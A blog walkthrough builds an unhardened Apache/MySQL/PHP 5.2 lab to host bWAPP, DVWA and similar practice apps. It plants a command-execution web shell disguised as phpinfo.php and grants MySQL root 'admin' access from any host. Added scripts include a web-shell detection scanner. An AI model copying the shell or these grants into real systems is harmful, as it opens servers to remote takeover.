APT404 - Don't Be Evil

On the road, always on the road!

Httpd 2.2.34 + Mysql 5.1.68 + centOS 6.8_x64 + Php 5.2.17



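I. First, deploy Apache

0x01 Continuing with the system we prepared earlier: first, upload all the source packages to be installed to the server. The package list is as follows: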

httpd-2.2.34.tar.gz
libiconv-1.14.tar.gz
libmcrypt-2.5.8.tar.gz
mcrypt-2.6.8.tar.gz
mhash-0.9.9.9.tar.gz
mysql-5.1.68.tar.gz
php-5.2.17.tar.gz
cronolog-1.6.2.tar.gz

The overall stack to be built this time is as follows:

httpd 2.2.34  + mysql 5.1.68 + centOS 6.8_x64 + php 5.2.17

0x02 Compile and install httpd 2.2.34. Before that, you need to install the required dependency libraries. The steps are as follows:

# yum install zlib zlib-devel gcc-c++ -y
# tar xf httpd-2.2.34.tar.gz && cd httpd-2.2.34

# ./configure --prefix=/usr/local/httpd-2.2.34 \
--enable-deflate \
--enable-expires \
--enable-headers \
--enable-modules=most \
--enable-so \
--with-mpm=worker \
--enable-rewrite

# make && make install
# echo $?

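0x03 Remove the version number from the Apache install path (via a symlink) to make later scripted management easier, start httpd, and add it to system startup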

# ln -s /usr/local/httpd-2.2.34/ /usr/local/httpd
# cd /usr/local/httpd && ll
# /usr/local/httpd/bin/apachectl -l
# vi /usr/local/httpd/conf/httpd.conf
ServerName localhost:80
# /usr/local/httpd/bin/apachectl start
# echo "/usr/local/httpd/bin/apachectl start" >> /etc/rc.local
# cd /usr/local/httpd/conf/ && cp httpd.conf httpd.conf.bak && egrep -v "^$|#" httpd.conf.bak > httpd.conf
# /usr/local/httpd/bin/apachectl -t
# /usr/local/httpd/bin/apachectl graceful

0x04 Notes on using the apachectl tool

# /usr/local/httpd/bin/apachectl -h
# /usr/local/httpd/bin/apachectl -l
# /usr/local/httpd/bin/apachectl -M

0x05 Edit the main Apache configuration file httpd.conf, enable the extra configuration files, and define the web directories. The full httpd.conf is as follows:

# useradd tmp -s /sbin/nologin -M
# mkdir /var/html/{bwapp,wp,discuz,drupal,joomla,phpcms,phpbb,dvwa} -p

# vi /usr/local/httpd/conf/httpd.conf

ServerRoot "/usr/local/httpd-2.2.34"
Listen 80
<IfModule !mpm_netware_module>
<IfModule !mpm_winnt_module>
User tmp
Group tmp
</IfModule>
</IfModule>
ServerAdmin seclamp@sec.com
ServerName localhost:80
DocumentRoot "/usr/local/httpd-2.2.34/htdocs"
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "/usr/local/httpd-2.2.34/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from all
</Directory>
<IfModule dir_module>
DirectoryIndex index.html
</IfModule>
<FilesMatch "^\.ht">
Order allow,deny
Deny from all
Satisfy All
</FilesMatch>
ErrorLog "logs/error_log"
LogLevel warn
<IfModule log_config_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
<IfModule logio_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
</IfModule>
CustomLog "logs/access_log" common
</IfModule>
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/httpd-2.2.34/cgi-bin/"
</IfModule>
<IfModule cgid_module>
</IfModule>
<Directory "/usr/local/httpd-2.2.34/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
DefaultType text/plain
<IfModule headers_module>
RequestHeader unset Proxy early
</IfModule>
<IfModule mime_module>
TypesConfig conf/mime.types
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz
</IfModule>
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
Include conf/extra/httpd-vhosts.conf
Include conf/extra/httpd-mpm.conf
Include conf/extra/httpd-default.conf
<Directory "/var/html">
Options FollowSymLinks
AllowOverride None
Order allow,deny
Allow from all
</Directory>

0x06 Edit the httpd-vhosts.conf extra configuration file and add name-based virtual hosts

# vi /usr/local/httpd/conf/extra/httpd-vhosts.conf

NameVirtualHost *:80
<VirtualHost *:80>
ServerAdmin bwapp@bwapp.com
DocumentRoot "/var/html/bwapp"
ServerName www.bwapp.com
ServerAlias www.bwapp.com
ErrorLog "logs/bwapp-error_log"
CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/bwapp-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin wp@wp.com
DocumentRoot "/var/html/wp"
ServerName wp.com
ServerAlias www.wp.com
ErrorLog "logs/wp-error_log"
CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/wp-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin discuz@discuz.com
DocumentRoot "/var/html/discuz"
ServerName discuz.com
ServerAlias www.discuz.com
ErrorLog "logs/discuz-error_log"
CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/discuz-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin drupal@durpal.com
DocumentRoot "/var/html/drupal"
ServerName drupal.com
ServerAlias www.drupal.com
ErrorLog "logs/drupal-error_log"
CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/drupal-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin joomla@joomla.com
DocumentRoot "/var/html/joomla"
ServerName joomla.com
ServerAlias www.joomla.com
ErrorLog "logs/joomla-error_log"
CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/joomla-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin phpcms@phpcms.com
DocumentRoot "/var/html/phpcms"
ServerName phpcms.com
ServerAlias www.phpcms.com
ErrorLog "logs/phpcms-error_log"
CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phpcms-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin phpbb@phpbb.com
DocumentRoot "/var/html/phpbb"
ServerName phpbb.com
ServerAlias www.phpbb.com
ErrorLog "logs/phppp-error_log"
CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phppp-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin dvwa@bwapp.com
DocumentRoot "/var/html/dvwa"
ServerName dvwa.com
ServerAlias www.dvwa.com
ErrorLog "logs/dvwa-error_log"
CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/dvwa-access_%Y%m%d.log" combined
</VirtualHost>

0x07 Use the cronolog tool for automatic log rotation; just adjust each virtual host to the following format

# tar xf cronolog-1.6.2.tar.gz
# cd cronolog-1.6.2
# ./configure && make && make install
# echo $?

# vi /usr/local/httpd/conf/extra/httpd-vhosts.conf
<VirtualHost *:80>
ServerAdmin phpbb@phpbb.com
DocumentRoot "/var/html/phpbb"
ServerName phpbb.com
ServerAlias www.phpbb.com
ErrorLog "logs/phppp-error_log"
CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phppp-access_%Y%m%d.log" combined
</VirtualHost>

0x08 Initial Apache tuning

Adjust Apache's default concurrency

# vi /usr/local/httpd/conf/extra/httpd-mpm.conf
<IfModule mpm_worker_module>
StartServers 2
MaxClients 300
MinSpareThreads 45
MaxSpareThreads 75
ThreadsPerChild 25
MaxRequestsPerChild 0
</IfModule>

Hide the Apache version number at the configuration-file level

# vi /usr/local/httpd/conf/extra/httpd-default.conf

Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 5
UseCanonicalName Off
AccessFileName .htaccess
ServerTokens Prod
ServerSignature Off
HostnameLookups Off

# /usr/local/httpd/bin/apachectl -t
# /usr/local/httpd/bin/apachectl graceful
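
An added check for the banner-hiding step above (not part of the original post): ServerTokens and ServerSignature in httpd-default.conf only take effect if httpd.conf actually includes that file, so this sketch audits both. The function names and the constructed sample files are assumptions, and it inspects only the two files it is given.

```shell
#!/bin/sh
# Added example. Sample files below are constructed for the demonstration.

# effective_value FILE DIRECTIVE: print the last uncommented value, lowercased
# (a later occurrence of these directives overrides an earlier one).
effective_value() {
    awk -v d="$2" 'tolower($1) == tolower(d) { v = tolower($2) } END { print v }' "$1"
}

# include_active MAIN_CONF PATH: succeed if an uncommented Include names PATH.
include_active() {
    awk -v p="$2" 'tolower($1) == "include" && $2 == p { ok = 1 } END { exit !ok }' "$1"
}

# audit_banner MAIN_CONF DEFAULT_CONF: print findings, return how many there were.
audit_banner() {
    findings=0
    if ! include_active "$1" "conf/extra/httpd-default.conf"; then
        echo "FAIL: httpd-default.conf is not included, so its settings are ignored"
        findings=$((findings + 1))
    fi
    case "$(effective_value "$2" ServerTokens)" in
        prod|productonly) ;;
        *) echo "FAIL: ServerTokens is not Prod (unset means the default, Full)"
           findings=$((findings + 1)) ;;
    esac
    case "$(effective_value "$2" ServerSignature)" in
        ""|off) ;;   # unset is fine: the default is Off
        *) echo "FAIL: ServerSignature is not Off"
           findings=$((findings + 1)) ;;
    esac
    return "$findings"
}

demo=$(mktemp -d)
printf '%s\n' 'ServerName localhost:80' 'Include conf/extra/httpd-default.conf' > "$demo/good-httpd.conf"
printf '%s\n' 'ServerTokens Full' 'ServerTokens Prod' 'ServerSignature Off' > "$demo/good-default.conf"
printf '%s\n' '#Include conf/extra/httpd-default.conf' > "$demo/bad-httpd.conf"
printf '%s\n' '# ServerTokens Prod' 'ServerSignature On' > "$demo/bad-default.conf"

audit_banner "$demo/good-httpd.conf" "$demo/good-default.conf" && echo "good: no findings"
audit_banner "$demo/bad-httpd.conf" "$demo/bad-default.conf" || echo "bad: $? finding(s)"
```

On the lab host the call would be `audit_banner /usr/local/httpd/conf/httpd.conf /usr/local/httpd/conf/extra/httpd-default.conf`.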

II. Deploy MySQL

Create the mysql service user

# groupadd mysql
# useradd mysql -s /sbin/nologin -M -g mysql

Compile and install mysql-5.1.68. The full build options are as follows:

# yum install ncurses-devel openssl openssl-devel -y
# tar xf mysql-5.1.68.tar.gz
# cd mysql-5.1.68

# ./configure \
--prefix=/usr/local/mysql-5.1.68 \
--with-unix-socket-path=/usr/local/mysql-5.1.68/tmp/mysql.sock \
--localstatedir=/usr/local/mysql-5.1.68/data \
--enable-assembler \
--enable-thread-safe-client \
--enable-static \
--with-mysqld-user=mysql \
--with-big-tables \
--without-debug \
--with-pthread \
--with-charset=utf8 \
--with-extra-charsets=all \
--with-readline \
--with-ssl \
--with-embedded-server \
--enable-local-infile \
--with-plugins=max \
--with-plugins=partition,innobase \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static

# make && make install
# echo $?
# ln -s /usr/local/mysql-5.1.68/ /usr/local/mysql

Quickly initialize MySQL

# cp support-files/my-small.cnf /etc/my.cnf
# mkdir -p /usr/local/mysql/{data,tmp}
# chown -R mysql.mysql /usr/local/mysql
# /usr/local/mysql/bin/mysql_install_db --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data/ --user=mysql
# chown -R root.root /usr/local/mysql/
# chown -R mysql.mysql /usr/local/mysql/{tmp,data}
# /usr/local/mysql/bin/mysqld_safe &
# echo "/usr/local/mysql/bin/mysqld_safe &" >> /etc/rc.local
# lsof -i :3306
# cp /usr/local/mysql/bin/* /usr/local/sbin/
# mysqladmin -uroot password "admin"

# mysql -uroot -p
mysql> drop database test;
mysql> select user,host from mysql.user;
mysql> drop user ''@'localhost';
mysql> drop user ''@'seclamp';
mysql> drop user 'root'@'seclamp';
mysql> grant all on *.* to 'root'@'%' identified by 'admin' with grant option;flush privileges;

III. Deploy PHP

Install all the required dependency libraries

# yum install -y zlib zlib-devel libxml2-devel libjpeg 
# yum install -y libjpeg-devel libpng libpng-devel libxslt-devel
# yum install -y freetype freetype-devel gd gd-devel curl curl-devel
# yum install epel-release -y
# yum install libmcrypt libmcrypt-devel mcrypt mhash mhash-devel openssl openssl-devel bzip2-devel -y
# wget https://ftp.gnu.org/gnu/libiconv/libiconv-1.14.tar.gz
# tar xf libiconv-1.14.tar.gz
# cd libiconv-1.14 && ./configure --prefix=/usr/local/libiconv && make && make install
# ln -s /usr/lib64/libjpeg.so /usr/lib/libjpeg.so
# ln -s /usr/lib64/libpng.so /usr/lib/libpng.so
# yum install libtool libtool-ltdl-devel -y

Compile and install php 5.2.17. When copying the command, be sure to watch the whitespace

# tar xf php-5.2.17.tar.gz
# cd php-5.2.17

# ./configure \
--prefix=/usr/local/php-5.2.17 \
--with-apxs2=/usr/local/httpd/bin/apxs \
--with-mysql=/usr/local/mysql \
--with-pdo-mysql=/usr/local/mysql \
--with-config-file-path=/etc \
--with-config-file-scan-dir=/etc/php.d \
--with-xmlrpc \
--with-openssl \
--with-zlib \
--with-bz2 \
--with-gettext \
--with-mhash \
--with-mcrypt \
--with-libxml-dir \
--with-iconv=/usr/local/libiconv \
--with-curl \
--with-gd \
--with-jpeg-dir \
--with-png-dir \
--with-freetype-dir \
--enable-gd-native-ttf \
--enable-bcmath \
--enable-mbstring \
--enable-zip \
--enable-soap \
--enable-sockets \
--enable-ftp \
--enable-static \
--enable-zend-multibyte \
--without-pear

# echo "#LoadModule php5_module /usr/local/httpd-2.2.34/modules/libphp5.so" >> /usr/local/httpd/conf/httpd.conf
# make && make install
# ln -s /usr/local/php-5.2.17/ /usr/local/php
# ll /usr/local/httpd/modules/
# grep "libphp5" /usr/local/httpd/conf/httpd.conf
# cp php.ini-dist /etc/php.ini

Install the PHP extension libraries

# yum install autoconf -y
# cd ext/mysqli/
# /usr/local/php/bin/phpize
# ./configure --prefix=/usr/local/mysqli \
--with-php-config=/usr/local/php/bin/php-config \
--with-mysqli=/usr/local/mysql/bin/mysql_config

# make && make install
# ls /usr/local/php-5.2.17/lib/php/extensions/no-debug-zts-20060613/
# vi /etc/php.ini
extension_dir = "/usr/local/php-5.2.17/lib/php/extensions/no-debug-zts-20060613/"
extension=mysqli.so

# vi /usr/local/httpd/conf/httpd.conf

<IfModule dir_module>
DirectoryIndex index.php index.html
</IfModule>
<IfModule mime_module>
TypesConfig conf/mime.types
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz
AddType application/x-httpd-php .php
</IfModule>

Go back and carefully check that the extensions you just compiled are really installed, and that the web service user is the one you configured

# vi /var/html/bwapp/phpinfo.php
<?php
echo "<pre>";
@system($_GET['cmd']);
echo "</pre>";
phpinfo();
?>
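
An added cleanup check, not from the original post: the phpinfo.php test file above runs whatever is passed in `cmd`, so it should not outlive the verification step. This heuristic scan lists PHP files under a docroot that pass request parameters to command-execution functions or expose phpinfo(); the function name and the constructed sample tree are assumptions.

```shell
#!/bin/sh
# Added example. The sample docroot below is constructed for the demonstration.

# find_debug_php DOCROOT: list suspicious *.php files; return 0 if none, 1 otherwise.
# Heuristic, line-based matching: it flags candidates for review, nothing more.
find_debug_php() {
    hits=$(
        find "$1" -type f -name '*.php' | while IFS= read -r f; do
            # A request superglobal on the same line as a command-execution call
            # (the unanchored "exec" also covers shell_exec).
            if grep -Eq '(system|exec|passthru|popen|proc_open)[[:space:]]*\(.*\$_(GET|POST|REQUEST|COOKIE)' "$f"; then
                echo "$f: request parameter reaches a command-execution function"
            fi
            if grep -Eq 'phpinfo[[:space:]]*\(' "$f"; then
                echo "$f: phpinfo() output is exposed"
            fi
        done
    )
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

lab=$(mktemp -d)
mkdir -p "$lab/bwapp" "$lab/wp"
# Constructed copy of the test file from this page.
cat > "$lab/bwapp/phpinfo.php" <<'EOF'
<?php
echo "<pre>";
@system($_GET['cmd']);
echo "</pre>";
phpinfo();
?>
EOF
printf '%s\n' '<?php echo "hello"; ?>' > "$lab/wp/index.php"

find_debug_php "$lab/bwapp" || echo "bwapp: remove or restrict the files listed above"
find_debug_php "$lab/wp" && echo "wp: clean"
```

On the lab host the docroot to scan is `/var/html`.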

IV. Install various open-source applications to fully check that the environment works

Install the bWAPP vulnerability practice application
Install the DVWA vulnerability practice application
Install Discuz X3.2
Install Drupal 7.56
Install WordPress 4.8.1
Install Joomla 3.6.5
...

End
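Write scripts, write scripts, write scripts (important things get said three times), or, more bluntly, once everything is configured just build it into an rpm package. Also, this environment is only for my own learning, so essentially no hardening has been done. Do not use it directly as a reference for a real production environment; otherwise, you bear all the consequences yourself.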

